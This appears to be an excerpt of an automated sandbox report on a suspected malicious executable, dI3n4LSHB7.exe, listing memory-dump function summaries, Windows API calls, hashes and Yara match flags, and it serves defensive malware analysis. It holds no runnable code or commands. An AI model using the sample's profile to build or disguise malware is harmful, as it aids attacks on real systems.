                                                                                • String ID: C:\Users\user\Desktop\dI3n4LSHB7.exe$obA
                                                                                • API String ID: 0-160033671
                                                                                • Opcode ID: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                                                • Instruction ID: d8f7faa714452712b8dd2e2ad71d7e848a624b740a48fc3c62d8856f0a647b07
                                                                                • Opcode Fuzzy Hash: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                                                • Instruction Fuzzy Hash: E321F971600219BFDB20AF668C81DAB776DEF00368712863BFD15D7291D738ED8187A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 0-537541572
                                                                                • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                                                • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                                                • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                                                • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 0-537541572
                                                                                • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                                                • Instruction ID: 9472c79033c58d28bd5fab4bb402529842eae37fc53cf50cf89856cde478e707
                                                                                • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                                                • Instruction Fuzzy Hash: 1F21D571E09221ABCB218B259C44BDB3758AF017A4F254527EE06A73A0F63CFC41C6E8
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                                                • Instruction ID: ac17cb0af868b7526b005f1881a5d85344935facab28da11e2c1ee98c68393b6
                                                                                • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                                                • Instruction Fuzzy Hash: 17113D72785B04BAE721BBB0CC06FCB779CEF04708F40C819A69A670D1DA69F5558661
                                                                                APIs
                                                                                  • Part of subcall function 04B572B1: _free.LIBCMT ref: 04B572D6
                                                                                • _free.LIBCMT ref: 04B57337
                                                                                  • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                                                                  • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                                                                • _free.LIBCMT ref: 04B57342
                                                                                • _free.LIBCMT ref: 04B5734D
                                                                                • _free.LIBCMT ref: 04B573A1
                                                                                • _free.LIBCMT ref: 04B573AC
                                                                                • _free.LIBCMT ref: 04B573B7
                                                                                • _free.LIBCMT ref: 04B573C2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                                                • Instruction ID: f3638e34a91a9eb389efc8ebeddf53615fc296e693e6a5b1e9022694aa798f79
                                                                                • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                                                • Instruction Fuzzy Hash: C1117F31A50B08BAE920B7B1DC05FCBF79CEF05704F800858FBAD760B0DA66B5145660
                                                                                APIs
                                                                                  • Part of subcall function 0041704A: _free.LIBCMT ref: 0041706F
                                                                                • _free.LIBCMT ref: 004170D0
                                                                                  • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                                  • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                                • _free.LIBCMT ref: 004170DB
                                                                                • _free.LIBCMT ref: 004170E6
                                                                                • _free.LIBCMT ref: 0041713A
                                                                                • _free.LIBCMT ref: 00417145
                                                                                • _free.LIBCMT ref: 00417150
                                                                                • _free.LIBCMT ref: 0041715B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                                                • Instruction ID: 17f1ba636a3ac0ac971b1a3f484e478362915a153c89e36741bf365215ef3bb6
                                                                                • Opcode Fuzzy Hash: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                                                • Instruction Fuzzy Hash: 9C118EB2585744B6D520B772CC06FCB7BEC6F48304F40481FB69E66063EA2CAAC04645
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(00000000,00000000,00000000), ref: 04B57F82
                                                                                • __fassign.LIBCMT ref: 04B58161
                                                                                • __fassign.LIBCMT ref: 04B5817E
                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B581C6
                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04B58206
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B582B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                • String ID:
                                                                                • API String ID: 4031098158-0
                                                                                • Opcode ID: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                                                • Instruction ID: 8606dff038d5312d631dc210a50766c7e4134fa67084ac058c82fc762aa38f79
                                                                                • Opcode Fuzzy Hash: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                                                • Instruction Fuzzy Hash: ACD1C970E016489FDF11DFE8D880AEDFBB5FF48304F2840AAE815BB261D631A952CB50
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 00417D1B
                                                                                • __fassign.LIBCMT ref: 00417EFA
                                                                                • __fassign.LIBCMT ref: 00417F17
                                                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00417F5F
                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00417F9F
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041804B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                • String ID:
                                                                                • API String ID: 4031098158-0
                                                                                • Opcode ID: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                                                • Instruction ID: bf6bde338aaa4c5312f696cbfa7b8c1c2da82e764b9ff6896d8d464e3c4a4b13
                                                                                • Opcode Fuzzy Hash: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                                                • Instruction Fuzzy Hash: 13D19C71E042589FCF15CFA8C9809EEBBB5FF49314F29006AE815BB341D735A986CB58
                                                                                APIs
                                                                                • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                                                • __fassign.LIBCMT ref: 1000B905
                                                                                • __fassign.LIBCMT ref: 1000B922
                                                                                • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 1735259414-0
                                                                                • Opcode ID: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                                                                • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                                                                • Opcode Fuzzy Hash: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                                                                • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                                                                • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                                                • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                                                                • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                                                • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,04B4B002,04B4A5C6,04B49C00), ref: 04B4B019
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04B4B027
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04B4B040
                                                                                • SetLastError.KERNEL32(00000000,04B4B002,04B4A5C6,04B49C00), ref: 04B4B092
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                                • Instruction ID: 5d97d5de8773b9d009742cf9eef0d20d8d296e21d72a888fe39dd23c57b746e0
                                                                                • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                                • Instruction Fuzzy Hash: 9D01AC3270D3116FBB346FB47C849762B54EB8167A72102B9F724562E1EF59F8127144
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,0040AD9B,0040A35F,00409999), ref: 0040ADB2
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040ADC0
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040ADD9
                                                                                • SetLastError.KERNEL32(00000000,0040AD9B,0040A35F,00409999), ref: 0040AE2B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                                • Instruction ID: f4b61bc4878066cd9e5532c4ff7823403916b0aca9ffed94e046062e6da044f3
                                                                                • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                                • Instruction Fuzzy Hash: 6201D8722493125FE6342A76BC459572A54EB51779720033FF910B71E2EF3D4C32558E
                                                                                Strings
                                                                                • C:\Users\user\Desktop\dI3n4LSHB7.exe, xrefs: 04B56388
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                                • API String ID: 0-2740803753
                                                                                • Opcode ID: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                                                • Instruction ID: f552e073e65239589d6095b5991a64c7f020a132d82bace3d2b8a8f69f5e1887
                                                                                • Opcode Fuzzy Hash: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                                                • Instruction Fuzzy Hash: 7221D471600105BFEB20BF698C80E6BB7ADEF402A874185A4FD2DC7260E731FC519760
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0040BED8,?,?,0042B000,00000000,?,0040C003,00000004,InitializeCriticalSectionEx,0041EAF4,InitializeCriticalSectionEx,00000000), ref: 0040BEA7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID: api-ms-
                                                                                • API String ID: 3664257935-2084034818
                                                                                • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                                                • Instruction ID: 1d2ba87bd7351691bab4046b775a4f225d6c09ed93031ba1482b23a36008251d
                                                                                • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                                                • Instruction Fuzzy Hash: 1B11C135A41620ABCB228B68DC45BDA7794EF02760F114632EE05B73C0D778EC058ADD
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                                                • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                                                                • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                                                • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040EF44,?,?,0040EF0C,00000000,74DEDF80,?), ref: 0040EF64
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF77
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,0040EF44,?,?,0040EF0C,00000000,74DEDF80,?), ref: 0040EF9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                                                • Instruction ID: a9aeb9bb373945a448fb4c2f2a76f55d061337ba3b70deabe2e5838c542f66b1
                                                                                • Opcode Fuzzy Hash: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                                                • Instruction Fuzzy Hash: E0F0A070A0421AFBCB119B52ED09BDEBF78EF00759F144071F905B21A0CB788E11DB98
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                                                • __alloca_probe_16.LIBCMT ref: 1000A736
                                                                                • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                                                • __freea.LIBCMT ref: 1000A837
                                                                                • __freea.LIBCMT ref: 1000A843
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: __alloca_probe_16__freea$Info
                                                                                • String ID:
                                                                                • API String ID: 2330168043-0
                                                                                • Opcode ID: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                                                                • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                                                                • Opcode Fuzzy Hash: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                                                                • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                                                                APIs
                                                                                • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                                                • __alloca_probe_16.LIBCMT ref: 1000B101
                                                                                • __freea.LIBCMT ref: 1000B16D
                                                                                  • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                                                • __freea.LIBCMT ref: 1000B176
                                                                                • __freea.LIBCMT ref: 1000B199
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1423051803-0
                                                                                • Opcode ID: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                                                                • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                                                                • Opcode Fuzzy Hash: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                                                                • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: __freea$__alloca_probe_16
                                                                                • String ID:
                                                                                • API String ID: 3509577899-0
                                                                                • Opcode ID: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
                                                                                • Instruction ID: 7078b575cb70d1788cb53d15e2d783d1a5897dafc2c62b17d3425db1a5964cda
                                                                                • Opcode Fuzzy Hash: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
                                                                                • Instruction Fuzzy Hash: 1D510472601216AFEF209F608C89FBB37A9EF84354F1981A9FD04E7180E735FC5196A4
                                                                                APIs
                                                                                • __alloca_probe_16.LIBCMT ref: 00413724
                                                                                • __alloca_probe_16.LIBCMT ref: 004137EA
                                                                                • __freea.LIBCMT ref: 00413856
                                                                                  • Part of subcall function 0041249E: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                                                • __freea.LIBCMT ref: 0041385F
                                                                                • __freea.LIBCMT ref: 00413882
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1423051803-0
                                                                                • Opcode ID: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                                                                • Instruction ID: 356f55c8d52bf468307c9bd9aee3ed648f54657124d7a114e97aef17e3d97ec8
                                                                                • Opcode Fuzzy Hash: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                                                                • Instruction Fuzzy Hash: 6151D3B2600206ABEF20AF55CC41EEB36E9EF44755F15412EFD18E7290D738DE9186A8
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 04B42C5F
                                                                                • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04B42C74
                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04B42C82
                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04B42C9D
                                                                                • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04B42CBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                                                • String ID:
                                                                                • API String ID: 2509773233-0
                                                                                • Opcode ID: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                                                                • Instruction ID: 8e0c3b542556c10dfa7e3922ea7325ac6b0ed9a3e589e4877d3c30077f841730
                                                                                • Opcode Fuzzy Hash: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                                                                • Instruction Fuzzy Hash: 71310471B00014AFDB18DF68DC45FBAB768EF88704F0541E9F905EB252DB31A912EB94
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
